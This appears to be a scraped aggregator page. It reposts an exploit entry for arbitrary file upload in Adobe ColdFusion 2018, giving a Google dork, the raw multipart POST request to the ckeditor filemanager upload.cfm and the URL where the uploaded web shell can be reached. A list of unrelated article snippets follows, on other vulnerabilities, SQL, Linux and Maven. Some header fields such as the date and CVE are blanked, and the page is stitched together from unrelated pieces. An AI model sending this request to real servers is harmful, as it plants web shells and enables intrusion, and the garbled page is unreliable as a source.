[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload
# Exploit Title: Unrestricted file upload in Adobe ColdFusion
# Google Dork: ext:cfm
# Date: --
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version:
# Tested on: Adobe ColdFusion
# CVE : CVE--
# Comment: September , : Updates for ColdFusion and ColdFusion
have been elevated to Priority due to a report that CVE--
is now being actively exploited. ```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data;
boundary=---------------------------
Content-Length:
Connection: close
Upgrade-Insecure-Requests: -----------------------------
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg %shell code here%
-----------------------------
Content-Disposition: form-data; name="path" shell
-------------------------------
``` a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload的更多相关文章
- FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://www.wooyun.org ...
- jQuery File Upload 单页面多实例的实现
jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...
- 【转发】Html5 File Upload with Progress
Html5 File Upload with Progress Posted by Shiv Kumar on 25th September, 2010Senior Sof ...
- struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite
catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...
- CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server
CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server Severity: Medium Vendor: ...
- jQuery File Upload done函数没有返回
最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...
- kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸
kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸
- 用jQuery File Upload做的上传控件demo,支持同页面多个上传按钮
需求 有这么一个需求,一个form有多个文件要上传,但又不是传统的图片批量上传那种,是类似下图这种需求,一开始是用的swfupload做的上传,但是问题是如果有多个按钮的话,就要写很多重复的代码,于为 ...
- jquery file upload 文件上传插件
1. jquery file upload 下载 jquery file upload Demo 地址:https://blueimp.github.io/jQuery-File-Upload/ jq ...
随机推荐
- 循环TRUNCATE表,再ENABLE约束索引等
CREATE OR REPLACE PROCEDURE STG.FP_REMOVE_MST_OLD_DATA (EXITCODE OUT NUMBER) IS /******************* ...
- day39 mysql数据库基本操作
什么是数据库 用来存储数据的仓库 数据库可以在硬盘及内存中存储数据 主要学习硬盘中存储数据,因为内存中的数据总有一天会丢失 数据库与文件存储数据区别 (公司的开发是综合内容的) 数据库本质也是通过文件 ...
- np.cumsum()函数和正则表达式的含义
- 转:centos查看实时网络带宽占用情况方法
Linux中查看网卡流量工具有iptraf.iftop以及nethogs等,iftop可以用来监控网卡的实时流量(可以指定网段).反向解析IP.显示端口信息等. centos安装iftop的命令如下: ...
- highcharts echarts比较
1,highcharts底层是svg echarts底层是canvas 2,svg和canvas的区别 canvas 依赖分辨率 不支持事件处理器 弱的文本渲染能力 能够以 .png 或 .jpg 格 ...
- maven pom.xml文件 仓库搜索服务
POM(Project Object Model),即项目对象模型,是 Maven 工程的基本工作单元,是一个 XML 文件,包含了项目的基本信息,用于描述项目如何构建.声明项目依赖 等等 Maven ...
- springboot项目新功能开发
在原有的springboot项目上,复制了一个,然后将其中的src下的所有java文件都删除,gradle下把中间件都删除,直流springframework的,重新启动,发现 错误Failed to ...
- Linux 第六天
1)locate 在文件资料库中查找文件(需要文件资料库中有,新建的文件查不到,需要手动更新,updatedb.查不到/tmp目录下的文件) 语法:locate 文件名 常用选项: -i:无视大小写查 ...
- 工具SQL
1.数据库设计文档维护SQL SELECT COLUMN_NAME 列名, COLUMN_TYPE 数据类型, DATA_TYPE 字段类型, CHARACTER_MAXIMUM_LENGTH 长度, ...
- base operand of '->' has non-pointer type 'const Comple
base operand of '->' has non-pointer type 'const Comple ->操作符前面的操作数类型不是指针类型 错误原因 函数(&对象) { ...